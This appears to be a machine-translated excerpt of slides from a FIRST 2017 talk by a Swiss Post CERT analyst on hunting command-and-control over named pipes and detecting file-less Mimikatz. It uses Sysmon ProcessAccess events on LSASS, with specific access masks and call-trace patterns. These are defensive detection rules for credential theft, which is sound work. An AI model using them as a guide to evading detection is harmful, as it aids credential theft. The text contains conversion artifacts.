FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 100
Machine Translated by Google

Detecting C2 usingNamed Pipes

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 101
Machine Translated by Google

Detecting C2 usingNamed Pipes


ÿ Search for Processes creating «known malicious» Named Pipes
ÿ with or without «default PipeNames»

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 102
Machine Translated by Google

Detecting C2 usingNamed Pipes


ÿ Searching for «custom PipeNames» only

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 103
Machine Translated by Google

Detecting C2 usingNamed Pipes


ÿ Searching for «default & custom PipeNames»

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 104
Machine Translated by Google

Detecting C2 usingNamed Pipes


ÿ Searching for «default & custom PipeNames»

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 105
Machine Translated by Google

Detecting Mimikatz (even file-less)

ÿ Detecting ProcessAccess on LSASS.exe

ÿ Idea by Mark Russinovich (RSA talk)

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 106
Machine Translated by Google

Detecting Mimikatz
ÿ Point 1

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 107
Machine Translated by Google

Detecting Mimikatz
ÿ Point 1

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 108
Machine Translated by Google

Detecting Mimikatz
ÿ Point 1

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 109
Machine Translated by Google

Detecting Mimikatz
ÿ Search for ProcessAccess of LSASS.exe

ÿ GrantedAccess of: 0x1010, 0x1410, 0x143A

ÿ CallTrace: KERNELBASE.dll and (ntdll.dll or UNKNOWN)


ÿ

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 110
Machine Translated by Google

Detecting Mimikatz
ÿ Mimikatz executable from Github

ÿ File-based ÿ No «UNKNOWN» from shellcode / injection

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 111
Machine Translated by Google

Detecting Mimikatz
ÿ Cobalt Strike Beacon’s built-in Mimikatz «logonpasswords»
ÿ File-less ÿ «UNKNOWN» from shellcode / injection

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 112
Machine Translated by Google

Detecting Mimikatz
ÿ Invoke-Mimikatz using PowerPick from Cobalt Strike’s Beacon
ÿ File-less ÿ «UNKNOWN» from shellcode / injection

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 113
Machine Translated by Google

Detecting Mimikatz
ÿ Don’t search for specific SourceImage names
ÿ e.g. Rundll32.exe -- it could be really anything! (even cmd.exe ÿ)

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 114
Machine Translated by Google

Detecting Mimikatz (OpenProcess)

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 115
Machine Translated by Google

Detecting Mimikatz (OpenProcess)

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 116
Machine Translated by Google

I have some questions…


ÿ Please stand up…

ÿ Sit down if you…


ÿ didn’t learn anything new (resources, examples)

ÿ detect internal C&C using Named Pipes over SMB

ÿ detect in-memory / file-less Mimikatz on (all of) your hosts


ÿ Bonus: all versions of Mimikatz?

ÿ Everyone sitting now I would like to have a chat ÿ

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 117
Machine Translated by Google

Do you have questions?


ÿ Is there time left for Q&A?

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 118
Machine Translated by Google

Thank you for your attention!

Tom Ueltschi, Swiss Post CERT

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 119

You might also like